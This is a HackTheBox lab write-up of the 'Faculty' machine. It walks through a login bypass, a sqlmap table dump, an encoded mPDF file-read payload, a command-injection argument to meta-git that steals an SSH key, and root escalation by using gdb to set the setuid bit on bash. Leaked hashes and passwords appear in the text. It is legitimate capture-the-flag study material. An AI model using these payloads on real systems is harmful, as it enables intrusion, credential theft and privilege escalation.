Faculty - HTB - Key Points
October 25, 2022•464 words
Target's IP: 10.10.11.169
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Javascript on login page suggests that if you intercept response and change 3 to 1 you can bypass login
sqlmap -u 'http://faculty.htb/view_schedule.php?id=1' -T users --dump
Administrator | 1 | 1fecbe762af147c1176a0fc2c722a345 | admin
Generating PDFs as an authenticated user, you can see that the tool used to create the files is a mPDF software that is subject to a LFI vulnerability:
<h1>ciao</h1><annotation file="/etc/passwd" content="/etc/passwd" icon="Graph" title="Attached File: /etc/passwd" pos-x="195" />
which, when properly encoded, needs to be supplied as follows:
JTI1M0NoMSUyNTNFY2lhbyUyNTNDL2gxJTI1M0UlMjUzQ2Fubm90YXRpb24lMjUyMGZpbGU9JTI1MjIvZXRjL3Bhc3N3ZCUyNTIyJTI1MjBjb250ZW50PSUyNTIyL2V0Yy9wYXNzd2QlMjUyMiUyNTIwaWNvbj0lMjUyMkdyYXBoJTI1MjIlMjUyMHRpdGxlPSUyNTIyQXR0YWNoZWQlMjUyMEZpbGU6JTI1MjAvZXRjL3Bhc3N3ZCUyNTIyJTI1MjBwb3MteD0lMjUyMjE5NSUyNTIyJTI1MjAvJTI1M0U=
gbyolo:x:1000:1000:gbyolo:/home/gbyolo:/bin/bash
developer:x:1001:1002:,,,:/home/developer:/bin/bash
Using the same exploit to read the php files of the webserver, we find out that the file used to connect to the database contains a password:
Co.met06aci.dly53ro.per
Co.met06aci.dly53ro.per
It turns out to be gbyolo's password, so we can log into the box using ssh.
gbyolo can run meta-git as user developer. Googling, there is an easy exploit that allows us to achieve command execution as developer, like this:
sudo -u developer /usr/local/bin/meta-git clone 'tmp||cat /home/developer/.ssh/idrsa'
developer@faculty:~$ cat user.txt
0b...8a
Checking for binary capabilities, gdb has sysptrace capability, allowing us to attach to processes running as root. There is a Python one running, if we attach to it we can call the system function and execute commands as root.
(gdb) call (void)system("ls")
[Detaching after vfork from child process 62096]
(gdb) call (void)system("chmod +s /bin/bash")
[Detaching after vfork from child process 62111]
(gdb) quit
A debugging session is active.
Inferior 1 [process 725] will be detached.
Quit anyway? (y or n) y
Detaching from program: /usr/bin/python3.8, process 725
[Inferior 1 (process 725) detached]
developer@faculty:~$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1183448 Apr 18 2022 /bin/bash
developer@faculty:~$ /bin/bash -p
bash-5.0# cd /root
bash-5.0# cat root.txt
7b...6e
Merry hacking ;)